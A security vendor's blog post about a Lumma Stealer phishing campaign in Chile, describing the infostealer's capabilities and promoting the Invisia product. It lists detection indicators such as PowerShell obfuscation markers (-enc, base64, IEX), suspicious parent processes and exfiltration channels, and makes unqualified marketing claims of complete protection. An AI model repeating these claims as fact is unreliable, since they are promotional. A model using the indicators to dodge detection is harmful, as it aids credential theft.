SecureLabs
EN | ES
Lumma Stealer malware affecting companies in Chile

Lumma Stealer in Chile

How this malware operates —and why Invisia stops it completely

Case overview: a malware still active in 2025

Santiago, May 2025

In recent weeks, multiple companies and public organizations in Chile have reported a new wave of malicious emails impersonating the SII (Internal Revenue Service) and other well-known institutions. These messages, carefully crafted, trick users into downloading ZIP or PDF files that actually contain malware. The goal: to steal sensitive information without the victim realizing it.
One of the main actors behind this campaign is Lumma Stealer, an infostealer malware distributed through phishing techniques and compromised links. While its design isn’t new, its efficiency has kept it relevant since 2022, continuously evolving and improving its evasion tactics.

The malware doesn’t just target home users—it has also been detected in corporate environments, including government networks and financial sector companies.

What is Lumma Stealer?

And why is it so dangerous in 2025?

Lumma Stealer is an active malware threat in Chile as of 2025. It belongs to the “infostealer” family and operates under the Malware as a Service (MaaS) model.
This means that any cybercriminal can pay to use it, customize it, and distribute it through their own phishing or attack campaigns.

Impact

Once executed on a victim's system, Lumma is capable of:

  • Stealing credentials stored in browsers like Chrome, Edge, and Firefox
  • Extracting clipboard data
  • Harvesting authentication tokens to access email or corporate accounts
  • Tracking cryptocurrency wallets and transferring funds
  • Collecting browsing history, session cookies, and more

Even worse: many of its variants are fileless, meaning they execute directly in memory. This evasion technique makes it one of the most complex and active malware threats affecting Chilean organizations in 2025.

The consequences can be devastating:
identity theft, financial fraud, hijacked business sessions, and even confidential data exfiltration.

How does Invisia respond? This is how it neutralizes Lumma Stealer

Unlike traditional antivirus tools, Invisia doesn’t rely on signatures or blacklists. Its approach is behavioral, proactive, and contextual—making it a truly effective barrier against modern threats like Lumma.

Is your company ready for Lumma Stealer? Schedule a free diagnostic with SecureLabs

Here’s how Invisia blocks each phase of the attack:

Execution phase: If the infected file is downloaded to Downloads or AppData, Invisia detects the suspicious path and automatically applies icacls rules to block its execution—even if the user clicks on it.

In-memory execution phase: If it manages to run, the file is analyzed in real time. Invisia detects:

  • Obfuscated arguments (e.g. -enc, base64, IEX)
  • Abnormal parent processes (e.g. winword.exe → cmd.exe)
  • Executables launched from suspicious paths like Temp, Public, or AppData

Result: the process is immediately terminated, and a visual alert is triggered for the system administrator.

Clipboard hijacking phase: Invisia already monitors clipboard activity. If it detects suspicious content being copied (tokens, passwords, credentials), it automatically replaces it with “BLOCKED BY INVISIA.”

Exfiltration phase: If the malware attempts to send data to destinations like Discord, Telegram Web, or custom domains, Invisia blocks the traffic, closes tabs, and alerts the system.

Persistence phase: If the attacker tries to leave a payload in the registry or set it to run at startup—even from a recovery environment—Invisia's dashboard detects it and reverses the changes remotely.

In summary:
Lumma Stealer doesn't survive any phase of the attack cycle when faced with Invisia.

Tips to prevent these attacks (even if you’re not using Invisia)

Although Invisia can stop these attacks even if users make mistakes, it’s still essential to follow basic cybersecurity best practices:

  • Never download attachments from suspicious emails—especially if they come in ZIP, RAR, .exe, or .scr formats
  • Don’t trust shortened links or messages from unknown senders
  • Always verify that the websites you visit are official by double-checking their domains
  • Keep your operating system and browsers updated
  • Use active and reputable security solutions
  • Train your team regularly to recognize phishing and social engineering attempts

SecureLabs: Creating solutions that not only detect threats, but reduce their existence from the source.

Want to learn how INVISIA can protect your company more intelligently?

Contact us here